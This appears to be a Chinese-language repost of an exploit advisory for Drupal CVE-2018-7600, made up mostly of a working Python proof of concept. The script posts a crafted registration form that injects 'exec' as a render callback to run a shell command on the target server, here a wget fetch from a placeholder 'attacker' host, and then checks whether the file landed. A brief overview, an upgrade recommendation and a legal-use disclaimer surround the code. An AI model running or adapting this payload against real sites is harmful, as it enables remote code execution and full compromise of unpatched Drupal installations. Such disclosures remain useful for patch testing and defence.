Drupal核心CVE-2018-7600远程执行代码漏洞

作者:Vitalii Rudnykh风险:危急

CVE:CVE-2018-7600 0day:远程执行代码

Exploit-id:Exploit-7600日期:2018-04-14

Overview

Drupal 7.x和8.x的多个子系统中存在一个远程代码执行漏洞。这可能会使攻击者利用Drupal站点上的多个攻击媒介,这可能会导致站点完全受到攻击。
安全团队已经写了 关于这个问题的 FAQ

POC

#!/usr/bin/env
import sys
import requests

print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')

target = raw_input('Enter target url (example: https://domain.ltd/): ')

url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}

r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')

请升级至最新版本的Drupal 7或8核心。


以上内容来源于网络,只提供合法测试用途。
请勿用于非法用途,否则后果自负.


转载请注明出处:https://www.freearoot.com/index.php/drupal核心cve-2018-7600远程执行代码漏洞/

文章来源:https://0day.asia/drupal-remote-code-execution